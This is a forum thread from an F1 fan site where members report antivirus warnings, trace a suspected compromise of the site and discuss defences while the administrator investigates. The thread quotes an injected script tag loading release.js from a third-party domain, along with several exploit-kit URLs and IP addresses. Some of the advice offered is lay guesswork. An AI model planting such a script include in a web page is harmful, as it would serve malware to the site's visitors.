F1Rejects.com

[Priceless]

Today when I came to the forum, I got greeted by a message by my anti-virus software (avast! 7, up-to-date) saying that it had blocked a malicious URL. Here's a picture of my screen as I came to the forum:



The picture is cropped to show the relevant details to this thread. Original is 1920x1080 pixels. JPEG quality was chosen to minimize file size while preserving the relevant details. As the image shows, there are 3 other malicious URLs blocked, all belonging to the same domain.

There is some other site hanging on to the forum that appears not to be related to the forum, and is not blocked by the anti-virus software, but appears to be a hack, too. While browsing, between page loads I noticed

Code: Select all

Waiting for www.daysofyorr.com...


(if the forum shows this as a link, DO NOT click it, also DO NOT attempt to go there via your browser's address bar) but it appears only briefly, so I haven't been able to capture a screenshot or get the full URL. This appears to happen at every page load in the forum. My browser is Firefox 11 beta.

It is not my intention to create panic or alarmism or anything of the sort, but I thought it might be important to bring this to people's attention.
Keep your anti-virus always up-to-date, people... and I suggest that the administrators look into it.

Sorry for any inconvenience this message might cause.

[Nuppiz]

A bit of Googling reveals this:

Code: Select all

http://www.daysofyorr.com

= Days of Y'Orr - A Boston Bruins Blog
Managed to catch it on my browser:


gloryhunterz.com = Malware according to this:

Code: Select all

http://www.gloryhunterz.com/z/xmlview | 82.192.87.28 | hosted-by.leaseweb.com. | exploit kit / requires referer

So, we do have a problem on our hands...

[DanielPT]

Code: Select all

http://www.daysofyorr.com

looks to me as being legit... Seen several reports and people claim it is safe. It might have been hacked of course since I too receive that malware report in my Anti-virus (Panda in my work and AVG at home).

[Sunshine_Baby_[IT]]

I have Kaspersky antivirus and it happen the same thing, I had a message where it appeared the daysofyor link.

[East Londoner]

I keep seeing that daysofyorr link whenever the forum is loading up. I hope it's not those pesky Indian hackers again

[tommykl]

I'm not getting that particular link, but I've had a few intrusions blocked by sites who also end with

Code: Select all

/z/wmlview

It says 'Malicious Exploit Kit Website 4'. I've been wondering where those came from...

[mario]

I have Kaspersky antivirus and it happen the same thing, I had a message where it appeared the daysofyor link.

It's one of those things where the link appears so briefly that to begin with I couldn't quite catch what was happening. I've also had the warnings over potentially dangerous links come up too, although in those instances it seems that they were related to spam posts on the forum at the same time.

[dr-baker]

I've had something similar last week, but with

Code: Select all

srv.gazsrc.net

...

[eytl]

I have also been receiving the avast malicious URL warnings. I must say I'm not sure what to do about any of this as I'm not tech savvy.

But I'll get Jamie to have a look into it.

Alternatively, anyone else got ideas?

[FullMetalJack]

I have been immune to this so far.

Maybe i'm HWNSNBM's young apprentice.

[dinizintheoven]

I am reading this forum on a Mac. Even so, I may be hurriedly archiving the F1RMGP threads and running them through Avast! on the laptop...

...although I'm seeing no content running through Chrome from either daysofyorr.com or the malware site. It says "waiting for www.f1rejects.com... as it should while the forum data is processing.

EDIT: hang on, I just did! "waiting for daysofyorr.com..."

Getting a bit worried now, even if I am on a Mac.

[dinizintheoven]

Right, to keep myself safe, I am looking on this forum using Linux until this business is sorted out. The hackers will never get in that way.

Via the safest operating system I can get my hands on, I've taken a screenshot of daysofyorr.com and it does seem to be legit. But, just to be safe, I know there are a couple of "friends of a friend" on Faceache who have been using the Boston Bruins icon as their personal icon, so I'd assume they're Bruins fans; I'm now trying to track them down and see if any of them are regular readers of Days Of Y'Orr, and if so, have they noticed anything fishy going on there.

The weird thing is, it seems to be random pages where this URL shows up. The thought did occur that maybe one of our regular posters has an icon stored on daysofyorr.com... but even though we have some regulars here from around that area, there don't seem to be any of them on this thread, and I don't remember seeing anything Bruins-related in anyone's icon here, irrespective of where they're from.

I suppose what I should do is browse the main F1 Rejects site and see if the daysofyorr.com URL appears while I'm looking there.
EDIT: nothing untoward on that front. Not yet, anyway.

[dr-baker]

I've had something similar last week, but with

Code: Select all

Waiting for srv.gazsrc.net

...

Sam I the only one to have got this occasionally instead? And what is this?

[tommykl]

I've had something similar last week, but with

Code: Select all

Waiting for srv.gazsrc.net

...

Sam I the only one to have got this occasionally instead? And what is this?

No I've had it as well. I have no idea what it is though...

[Priceless]

What it might be, I think, is that all those sites which we see transferring information on page loads here may have been hacked, maybe even by the same people using the same exploit. daysofyorr.com looks legit to me too, by the way.

I did the test on the main page and got the same warning from avast!, pointing to

Code: Select all

http://statcounters.org/z/xmlview


Also, Firefox showed to be transferring data from daysofyorr.com, too. It seems to be the more frequent site the exploit script "/z/xmlview" links to, but there may be others, as dr-baker and tommykl have noticed.
This line

Code: Select all

<script type="text/javascript" src="http://www.daysofyorr.com/release.js"></script>


appears on line 125 of the HTML source of the f1rejects.com main page. What's it doing there? It may have been injected by the exploit, I think...
I tried to download the script using an external tool, and although the server replies with HTTP 200 (OK) the content is a simple HTTP 404 (Not Found) page with only plain HTML inside.

EDIT:

I've had something similar last week, but with

Code: Select all

srv.gazsrc.net

...

I did a DNS reverse search on that domain. It points to 82.192.87.25. statcounters.org points to 82.192.87.16. Those sites are much likely in the same network.

I was able to have a look at the "release.js" script. I'm not a javascript wizard in any way, but to me it looks like that it targets Windows users running either Firefox or Internet Explorer (no version specified). Please note that this does not imply Google Chrome would be safe, however it might be a good choice for people on Windows. Those who can visit the forum from anything other than Windows, it would be best to do so while the problem is not cleared away.

If you have a firewall program on Windows, I think it would be good to add a rule on it to block connections to 82.192.87.0/24 IP range.
I think that's all I can do to contribute...

[Kuwashima]

OK, so I can't replicate the issue/s.

However, step 1 has been to update the BB's forum software to the latest release which often irons out a few bugs and holes in the code.

Please let me know how things look now and I'll move on to step 2.

[East Londoner]

A bit of Googling reveals this:

Code: Select all

http://www.daysofyorr.com

= Days of Y'Orr - A Boston Bruins Blog
Managed to catch it on my browser:

I'm still seeing this

[dr-baker]

OK, so I can't replicate the issue/s.

However, step 1 has been to update the BB's forum software to the latest release which often irons out a few bugs and holes in the code.

Please let me know how things look now and I'll move on to step 2.

Ahh, does this explain why I was not able to get onto the forums half-an-hour ago?

[FullMetalJack]

OK, so I can't replicate the issue/s.

However, step 1 has been to update the BB's forum software to the latest release which often irons out a few bugs and holes in the code.

Please let me know how things look now and I'll move on to step 2.

Ahh, does this explain why I was not able to get onto the forums half-an-hour ago?

Even I was unable to get on the forum about half an hour ago.

Maybe i'm not invincible?

[East Londoner]

OK, so I can't replicate the issue/s.

However, step 1 has been to update the BB's forum software to the latest release which often irons out a few bugs and holes in the code.

Please let me know how things look now and I'll move on to step 2.

Ahh, does this explain why I was not able to get onto the forums half-an-hour ago?

Even I was unable to get on the forum about half an hour ago.

Maybe i'm not invincible?

I think Jamie took the forums offline for a while just after 21:30 GMT...

[Kuwashima]

I think Jamie took the forums offline for a while just after 21:30 GMT...

Correct. Still investigating.

[dr-baker]

I think Jamie took the forums offline for a while just after 21:30 GMT...

Correct. Still investigating.

Well, keep up the good work.

By the way, for a long while, I also often get the following (including for the loading of this thread):

Code: Select all

Waiting for dl.dropbox.com/blahblahblah

...where blahblahblah represents what I cannot remember. I hadn't worried about this before because it happened often on these forums. Can anybody reassure me about this?

[Priceless]

By the way, for a long while, I also often get the following (including for the loading of this thread):

Code: Select all

Waiting for dl.dropbox.com/blahblahblah

...where blahblahblah represents what I cannot remember. I hadn't worried about this before because it happened often on these forums. Can anybody reassure me about this?

I for one host images I post on my personal Dropbox account, because it's convenient. I can do it quickly and straight from my desktop, it's available for Windows, Linux and Mac OS X, and offers 2 GB of online space for free with allowance for some more by performing certain actions (like inviting someone to the service). It can be used as an online backup and storage service, and has a "public" folder that makes files you put in it accessible to the Internet. The URLs of such files are in that format.

EDIT:By the way Jamie, the problem is not restricted to the forums, as I've found suspicious things in the main page as well. I'd say that it might be a problem with the web server. I may be able to provide dumps of the HTML in the page and the script I found there as seen by my browser, in case it helps.

[dr-baker]

By the way, for a long while, I also often get the following (including for the loading of this thread):

Code: Select all

Waiting for dl.dropbox.com/blahblahblah

...where blahblahblah represents what I cannot remember. I hadn't worried about this before because it happened often on these forums. Can anybody reassure me about this?

I for one host images I post on my personal Dropbox account, because it's convenient. I can do it quickly and straight from my desktop, it's available for Windows, Linux and Mac OS X, and offers 2 GB of online space for free with allowance for some more by performing certain actions (like inviting someone to the service). It can be used as an online backup and storage service, and has a "public" folder that makes files you put in it accessible to the Internet. The URLs of such files are in that format.

EDIT:By the way Jamie, the problem is not restricted to the forums, as I've found suspicious things in the main page as well. I'd say that it might be a problem with the web server. I may be able to provide dumps of the HTML in the page and the script I found there as seen by my browser, in case it helps.

It's what I thought, but thought I ought to check just in case... Thanks.

[simonracer]

I just got the "Malicious Kit Exploit 4 has been blocked" message for about the fifth time while viewing this whole forum.

EDIT: I'm getting the daysofyorr.com thingy as well.

[Stramala]

I've only been accessing F1 Rejects via my college PCs for 2 weeks now and I've not noticed any such problems. All network traffic is directed via a proxy server and they use Sophos on all workstations so it's a bit trickier for viruses to find their way into the system. I am afraid to look this up at home on my new Dell XPS which I only purchased 3 weeks ago

[DanielPT]

I've only been accessing F1 Rejects via my college PCs for 2 weeks now and I've not noticed any such problems. All network traffic is directed via a proxy server and they use Sophos on all workstations so it's a bit trickier for viruses to find their way into the system. I am afraid to look this up at home on my new Dell XPS which I only purchased 3 weeks ago

It will be a test of fire for your brand new PC!

[RealRacingRoots]

It will be a test of fire for your brand new PC!

My laptop is officially dead, so I will be getting a new one probably today. It will be a trial by Bristol once i get it and install all my lovely goodies on it. (Pinnacle Studio, Civ 5, etc)

[dr-baker]

As one of the sub-forums (not a thread, a forum) was loading (and even slightly beyond its loading), I had this website mentioned at the bottom of my browser:

Code: Select all

jospics.net/z/xml...

I missed the last three letters where the dots are, otherwise that was the whole address...

[BlindCaveSalamander]

I think the problem's getting worse, Norton Antivirus' picked up a trojan on my PC that I'm almost certain came from here. daysofyorr is also apparently loading up more and more things, before it took only an instant, now it's taking about a second or so. I suspect somebody set up shop there and is using that as a base of operations since daysofyorr/release.js is also coming up on autocomplete for a bunch of websites (.js being an extension for javascript files, which makes sense since I believe the exploit kit was coded in Java).

tl;dr, make sure your antivirus program is fully up-to-date, if you can, turn up the settings to aggressive or high or something along those lines until this is fixed.

[Wizzie]

I think the problem's getting worse, Norton Antivirus' picked up a trojan on my PC that I'm almost certain came from here. daysofyorr is also apparently loading up more and more things, before it took only an instant, now it's taking about a second or so. I suspect somebody set up shop there and is using that as a base of operations since daysofyorr/release.js is also coming up on autocomplete for a bunch of websites (.js being an extension for javascript files, which makes sense since I believe the exploit kit was coded in Java).

tl;dr, make sure your antivirus program is fully up-to-date, if you can, turn up the settings to aggressive or high or something along those lines until this is fixed.

The problem I have is that most anti-virus software craps itself whenever I try to run CSM for GP4. AVG on the other hand doesn't do that. However, it has also been picking up a busload of trojans over the past few weeks.

[East Londoner]

I'm getting scared. I want to go home. Please HWNSNBM, make it stop

[Priceless]

I think the problem's getting worse, Norton Antivirus' picked up a trojan on my PC that I'm almost certain came from here. daysofyorr is also apparently loading up more and more things, before it took only an instant, now it's taking about a second or so. I suspect somebody set up shop there and is using that as a base of operations since daysofyorr/release.js is also coming up on autocomplete for a bunch of websites (.js being an extension for javascript files, which makes sense since I believe the exploit kit was coded in Java).

I agree. I found apparently the same trojan on my Windows 7 PC a few days after my second post, and I'm also almost sure it came from this exploit.
I have removed it manually. I noticed it after a spike in network traffic in my router and the Java icon popping up out of nowhere in my taskbar.
I'm now posting from my laptop, also running Firefox 11 but on Linux, and for starters it seems to be OK. I think this is another evidence of what I found earlier - the exploit targets Windows users running either Firefox or Internet Explorer, any version. This does not mean security precautions should not be taken on other platforms/browsers too!

I would like to reiterate my earlier suggestion: access the forum with anything other than Windows, and if you're stuck with Windows, don't use neither Firefox nor Internet Explorer to come here. I would suggest Google Chrome. Opera might be another option. Additionally, use a good anti-virus and firewall, and if you use Windows Vista or Windows 7, as annoying as it might be, turn UAC on and use a non-administrative account.

[AndreaModa]

I myself have just switched from Firefox to Chrome for this very reason, god knows why I didn't do it earlier because it's far superior anyway!

[Klon]

Bah, I'd rather have my PC die in viruses than use Chrome.

[AndreaModa]

Bah, I'd rather have my PC die in viruses than use Chrome.

Mine's on the way out now anyway to be fair, so I'm not too fussed myself

[Ferrim]

Avast! keeps notifying me about malicious stuff blocked whenever I enter the forums.

[wmetcalf68]

I have Avast! as well, and it says that too!

[wmetcalf68]

I hate hackers! Also spammers!

[Klon]

Interestingly, my Avast has ceased to warn me about this forum today.